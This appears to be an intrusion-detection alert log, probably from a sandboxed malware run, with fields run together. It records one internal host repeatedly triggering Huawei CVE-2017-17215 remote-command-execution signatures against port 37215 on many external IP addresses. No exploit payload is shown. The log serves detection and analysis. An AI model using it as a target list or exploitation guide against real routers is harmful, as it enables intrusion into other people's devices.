                                            06/14/24-10:43:34.662475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4712437215192.168.2.14197.106.253.26
                                            06/14/24-10:43:56.245712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5714637215192.168.2.14197.86.180.183
                                            06/14/24-10:44:35.176532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4111037215192.168.2.1441.229.147.119
                                            06/14/24-10:44:14.672619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174237215192.168.2.14197.166.90.115
                                            06/14/24-10:43:58.274505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5227637215192.168.2.1441.153.222.224
                                            06/14/24-10:44:12.640789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5407037215192.168.2.14197.151.102.196
                                            06/14/24-10:44:29.023803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020037215192.168.2.1441.196.138.48
                                            06/14/24-10:44:18.766810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5781037215192.168.2.1441.63.216.51
                                            06/14/24-10:44:26.980588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419637215192.168.2.14156.210.229.20
                                            06/14/24-10:43:45.968268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926837215192.168.2.14197.33.37.113
                                            06/14/24-10:44:04.412083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586437215192.168.2.14197.185.114.178
                                            06/14/24-10:44:29.011485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291637215192.168.2.14156.122.88.68
                                            06/14/24-10:44:31.078671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4100837215192.168.2.1441.153.92.179
                                            06/14/24-10:44:10.564043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396837215192.168.2.1441.41.26.144
                                            06/14/24-10:44:18.779842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291437215192.168.2.14156.82.67.30
                                            06/14/24-10:43:39.808154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810037215192.168.2.1441.199.27.212
                                            06/14/24-10:44:00.323969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486237215192.168.2.14197.214.141.118
                                            06/14/24-10:44:22.879002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876037215192.168.2.14197.90.247.63
                                            06/14/24-10:44:24.947363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3410637215192.168.2.14197.18.238.13
                                            06/14/24-10:43:50.111133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5904837215192.168.2.14197.26.222.188
                                            06/14/24-10:43:45.966166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131437215192.168.2.14197.34.248.109
                                            06/14/24-10:44:10.547420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415637215192.168.2.14156.175.209.52
                                            06/14/24-10:44:18.777075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5640837215192.168.2.14197.105.2.181
                                            06/14/24-10:44:08.504762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572037215192.168.2.14156.84.215.52
                                            06/14/24-10:44:14.668801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3823637215192.168.2.14156.208.128.240
                                            06/14/24-10:43:54.184790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754237215192.168.2.14156.5.45.237
                                            06/14/24-10:44:04.404652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761637215192.168.2.14156.6.186.56
                                            06/14/24-10:44:29.013178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4346237215192.168.2.14197.174.39.67
                                            06/14/24-10:43:50.115692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5145837215192.168.2.14197.156.171.243
                                            06/14/24-10:44:02.366111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5640437215192.168.2.1441.4.113.183
                                            06/14/24-10:44:04.422923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4523237215192.168.2.14156.32.100.161
                                            06/14/24-10:43:52.161440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5008037215192.168.2.14197.121.214.68
                                            06/14/24-10:43:45.968335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4747437215192.168.2.1441.252.89.231
                                            06/14/24-10:43:41.846277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204237215192.168.2.14156.211.202.95
                                            06/14/24-10:43:54.185751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874637215192.168.2.14197.54.106.82
                                            06/14/24-10:44:16.718951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5655637215192.168.2.14156.127.145.7
                                            06/14/24-10:44:22.879361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3855437215192.168.2.14156.128.131.162
                                            06/14/24-10:43:48.020565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257237215192.168.2.1441.113.217.145
                                            06/14/24-10:44:26.997077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5581837215192.168.2.14197.29.106.168
                                            06/14/24-10:44:16.715267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4081637215192.168.2.14197.218.184.120
                                            06/14/24-10:44:29.025856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112837215192.168.2.14156.6.215.60
                                            06/14/24-10:44:29.027057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5546437215192.168.2.14197.62.97.238
                                            06/14/24-10:43:56.229974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5741237215192.168.2.1441.140.131.51
                                            06/14/24-10:44:33.149515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5675837215192.168.2.14156.154.88.89
                                            06/14/24-10:44:18.763051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038637215192.168.2.14156.38.90.82
                                            06/14/24-10:44:29.013316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446037215192.168.2.14197.28.128.255
                                            06/14/24-10:43:50.073723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618037215192.168.2.14197.45.183.14
                                            06/14/24-10:44:33.132808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3431237215192.168.2.1441.101.41.172
                                            06/14/24-10:44:12.618204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177237215192.168.2.14197.156.199.5
                                            06/14/24-10:43:48.018561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629037215192.168.2.1441.170.158.195
                                            06/14/24-10:43:36.723714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6064037215192.168.2.14156.186.209.190
                                            06/14/24-10:43:52.146341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951437215192.168.2.14197.228.105.145
                                            06/14/24-10:43:50.072963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437437215192.168.2.14156.179.29.225
                                            06/14/24-10:44:06.452220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5833837215192.168.2.1441.53.29.95
                                            06/14/24-10:44:29.012982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3564437215192.168.2.14197.219.150.247
                                            06/14/24-10:44:31.089840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475237215192.168.2.14197.125.95.200
                                            06/14/24-10:43:58.275811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4182037215192.168.2.14156.139.2.199
                                            06/14/24-10:44:29.027645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3533637215192.168.2.14156.150.37.239
                                            06/14/24-10:43:36.717057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3612637215192.168.2.14197.175.137.231
                                            06/14/24-10:44:12.641077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5468637215192.168.2.1441.129.235.119
                                            06/14/24-10:43:52.159837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084037215192.168.2.14156.175.162.239
                                            06/14/24-10:43:52.160215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893037215192.168.2.1441.208.178.233
                                            06/14/24-10:43:48.016364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3371437215192.168.2.1441.238.110.233
                                            06/14/24-10:44:29.021975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3954837215192.168.2.14197.182.130.241
                                            06/14/24-10:44:14.668740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4514837215192.168.2.14156.25.239.32
                                            06/14/24-10:43:56.229925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899637215192.168.2.14197.215.162.171
                                            06/14/24-10:44:18.766637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3811437215192.168.2.14197.13.252.48
                                            06/14/24-10:44:18.776647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5243637215192.168.2.14197.249.241.203
                                            06/14/24-10:44:14.685361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5979437215192.168.2.14197.39.0.46
                                            06/14/24-10:44:18.761300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441037215192.168.2.14197.118.42.54
                                            06/14/24-10:44:22.882836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3701637215192.168.2.1441.223.94.106
                                            06/14/24-10:44:31.079391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3324837215192.168.2.14197.66.194.21
                                            06/14/24-10:44:18.762537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570637215192.168.2.14156.180.219.30
                                            06/14/24-10:43:58.294871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115237215192.168.2.1441.25.181.120
                                            06/14/24-10:43:43.967774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4918237215192.168.2.14156.156.245.110
                                            06/14/24-10:44:26.980528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691837215192.168.2.14156.54.215.236
                                            06/14/24-10:44:08.503189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3868037215192.168.2.1441.136.71.134
                                            06/14/24-10:43:37.759223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3599237215192.168.2.1441.84.49.198
                                            06/14/24-10:44:33.133396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567037215192.168.2.1441.119.89.206
                                            06/14/24-10:43:41.906451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322037215192.168.2.14197.227.63.228
                                            06/14/24-10:44:10.564897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3715637215192.168.2.1441.215.55.67
                                            06/14/24-10:44:12.617590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510237215192.168.2.14197.186.220.68
                                            06/14/24-10:44:24.934424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706437215192.168.2.14156.254.147.159
                                            06/14/24-10:44:29.027342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520437215192.168.2.14156.252.44.184
                                            06/14/24-10:43:36.717636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449437215192.168.2.14197.199.250.147
                                            06/14/24-10:43:36.701326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355037215192.168.2.14197.50.229.224
                                            06/14/24-10:43:39.791352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304037215192.168.2.14197.18.189.212
                                            06/14/24-10:44:20.806991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3912037215192.168.2.1441.244.221.165
                                            06/14/24-10:43:58.292019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3970237215192.168.2.14156.162.235.239
                                            06/14/24-10:43:58.277689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3327437215192.168.2.14156.99.80.95
                                            06/14/24-10:43:43.943811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6049237215192.168.2.14197.209.252.37
                                            06/14/24-10:43:48.017308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5491237215192.168.2.1441.90.131.63
                                            06/14/24-10:44:04.420412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5353837215192.168.2.1441.124.92.48
                                            06/14/24-10:44:29.023833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739237215192.168.2.14156.68.46.233
                                            06/14/24-10:44:06.452358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762637215192.168.2.14156.82.40.196
                                            06/14/24-10:44:24.944178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745437215192.168.2.14156.69.180.178
                                            06/14/24-10:43:45.984917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746237215192.168.2.14156.215.212.224
                                            06/14/24-10:43:43.970992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994237215192.168.2.14156.137.77.48
                                            06/14/24-10:43:56.225596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958437215192.168.2.1441.154.3.51
                                            06/14/24-10:43:41.846422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682237215192.168.2.14197.81.94.253
                                            06/14/24-10:44:10.544471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3963037215192.168.2.14197.201.181.9
                                            06/14/24-10:44:33.149553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268837215192.168.2.14156.62.98.37
                                            06/14/24-10:43:48.031954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4489837215192.168.2.14156.28.147.134
                                            06/14/24-10:43:52.165421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4194837215192.168.2.14156.177.84.16
                                            06/14/24-10:43:39.790986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437837215192.168.2.14156.63.20.203
                                            06/14/24-10:43:37.762156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348437215192.168.2.14156.216.202.200
                                            06/14/24-10:43:58.292905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348637215192.168.2.1441.94.215.74
                                            06/14/24-10:44:22.859900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967037215192.168.2.14197.82.13.150
                                            06/14/24-10:44:26.985698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3718837215192.168.2.14197.14.228.80
                                            06/14/24-10:44:18.766695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405037215192.168.2.14197.135.126.240
                                            06/14/24-10:44:29.012810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969837215192.168.2.14156.110.109.169
                                            06/14/24-10:44:26.999513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981237215192.168.2.14156.100.226.224
                                            06/14/24-10:43:37.763243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5033637215192.168.2.14197.65.240.46
                                            06/14/24-10:44:02.367423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5120637215192.168.2.1441.112.80.69
                                            06/14/24-10:44:35.181482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3920437215192.168.2.1441.126.174.19
                                            06/14/24-10:44:35.183160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5538837215192.168.2.14197.78.184.28
                                            06/14/24-10:43:54.202117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6062037215192.168.2.1441.193.147.208
                                            06/14/24-10:44:10.546368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944437215192.168.2.1441.255.70.92
                                            06/14/24-10:44:18.775376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4321437215192.168.2.14197.90.30.98
                                            06/14/24-10:44:22.858245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3716437215192.168.2.14197.161.75.4
                                            06/14/24-10:44:22.879444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890037215192.168.2.1441.219.129.101
                                            06/14/24-10:44:26.998492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3595237215192.168.2.1441.253.200.124
                                            06/14/24-10:43:56.230225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201037215192.168.2.1441.117.136.42
                                            06/14/24-10:43:56.242864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682237215192.168.2.1441.124.206.56
                                            06/14/24-10:44:33.131960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699037215192.168.2.1441.63.144.57
                                            06/14/24-10:43:58.293206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981837215192.168.2.1441.49.66.246
                                            06/14/24-10:43:58.291618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4524837215192.168.2.14197.253.216.122
                                            06/14/24-10:43:36.725049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3703037215192.168.2.14197.132.130.56
                                            06/14/24-10:43:37.762146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5206837215192.168.2.1441.60.250.212
                                            06/14/24-10:43:56.245829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5795437215192.168.2.1441.175.201.120
                                            06/14/24-10:44:02.368699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3847437215192.168.2.14197.176.218.69
                                            06/14/24-10:43:34.661416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018637215192.168.2.14156.36.89.39
                                            06/14/24-10:44:22.881917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5317037215192.168.2.14197.135.243.80
                                            06/14/24-10:43:48.045758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5585237215192.168.2.1441.225.161.130
                                            06/14/24-10:44:06.453169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434637215192.168.2.1441.214.167.27
                                            06/14/24-10:44:04.411938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331037215192.168.2.14197.31.49.210
                                            06/14/24-10:43:52.150254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4173837215192.168.2.1441.131.69.236
                                            06/14/24-10:44:22.858449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4611037215192.168.2.14156.0.104.102
                                            06/14/24-10:44:12.645500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070837215192.168.2.14156.112.141.212
                                            06/14/24-10:44:22.858483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501837215192.168.2.1441.114.232.42
                                            06/14/24-10:43:50.075208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110237215192.168.2.14197.242.137.33
                                            06/14/24-10:44:00.343479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207837215192.168.2.14156.91.146.209
                                            06/14/24-10:43:41.898420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3914637215192.168.2.14197.38.35.149
                                            06/14/24-10:43:54.184709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3732837215192.168.2.14197.230.193.231
                                            06/14/24-10:44:04.419697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4589237215192.168.2.14156.113.151.63
                                            06/14/24-10:44:12.641582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874237215192.168.2.1441.88.109.211
                                            06/14/24-10:44:33.150886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607237215192.168.2.14197.25.76.212
                                            06/14/24-10:43:54.198985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4277037215192.168.2.14197.255.76.83
                                            06/14/24-10:43:39.809402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5737237215192.168.2.1441.194.8.16
                                            06/14/24-10:43:36.701770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5123837215192.168.2.1441.121.198.137
                                            06/14/24-10:43:43.940957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5937237215192.168.2.1441.52.73.243
                                            06/14/24-10:44:16.716030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5329437215192.168.2.1441.135.3.217
                                            06/14/24-10:44:06.453540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5937637215192.168.2.1441.12.117.248
                                            06/14/24-10:44:24.915109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367237215192.168.2.14197.63.255.53
                                            06/14/24-10:44:04.410089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4124437215192.168.2.14156.96.105.37
                                            06/14/24-10:44:08.518857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4910637215192.168.2.14197.161.224.27
                                            06/14/24-10:44:02.381260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570637215192.168.2.14197.249.103.110
                                            06/14/24-10:43:56.228110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3877637215192.168.2.14156.132.198.98
                                            06/14/24-10:44:35.181429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064437215192.168.2.14156.161.83.71
                                            06/14/24-10:43:52.164361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265837215192.168.2.14197.106.37.43
                                            06/14/24-10:43:48.028497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3498437215192.168.2.1441.157.31.166
                                            06/14/24-10:44:26.997327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113837215192.168.2.14156.52.70.155
                                            06/14/24-10:44:18.766104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084037215192.168.2.1441.233.122.95
                                            06/14/24-10:43:39.810493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3719037215192.168.2.1441.165.173.93
                                            06/14/24-10:44:02.368079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430237215192.168.2.14197.212.211.63
                                            06/14/24-10:44:06.451373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5387437215192.168.2.1441.131.103.73
                                            06/14/24-10:43:50.111723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552037215192.168.2.14156.5.54.152
                                            06/14/24-10:44:10.542779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578037215192.168.2.1441.157.22.159
                                            06/14/24-10:44:22.859190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674237215192.168.2.14156.135.97.188
                                            06/14/24-10:43:43.943464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774037215192.168.2.14197.176.174.149
                                            06/14/24-10:44:33.132885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289237215192.168.2.1441.43.228.127
                                            06/14/24-10:44:12.614424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5892437215192.168.2.14197.135.153.136
                                            06/14/24-10:43:39.812638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3526437215192.168.2.14197.104.47.130
                                            06/14/24-10:43:37.761745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4049237215192.168.2.14197.205.120.123
                                            06/14/24-10:43:39.793000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797637215192.168.2.14197.135.152.118
                                            06/14/24-10:44:16.718076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381237215192.168.2.14156.254.153.97
                                            06/14/24-10:44:06.470662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4036637215192.168.2.14156.32.102.136
                                            06/14/24-10:43:56.227062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5948437215192.168.2.14156.186.174.88
                                            06/14/24-10:43:41.846675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6049037215192.168.2.14197.164.6.148
                                            06/14/24-10:43:54.203026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997837215192.168.2.14197.32.209.205
                                            06/14/24-10:44:20.805301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362237215192.168.2.1441.62.13.113
                                            06/14/24-10:44:02.365529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965837215192.168.2.1441.81.20.17
                                            06/14/24-10:43:37.762784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515637215192.168.2.14197.240.114.83
                                            06/14/24-10:43:50.072626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563037215192.168.2.14156.238.190.238
                                            06/14/24-10:44:02.384563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947237215192.168.2.14156.114.220.3
                                            06/14/24-10:44:29.027981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4029437215192.168.2.14197.132.207.66
                                            06/14/24-10:44:06.471678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703037215192.168.2.14156.153.50.122
                                            06/14/24-10:43:52.159713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5793437215192.168.2.1441.214.32.244
                                            06/14/24-10:43:45.988969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4219237215192.168.2.14156.26.137.91
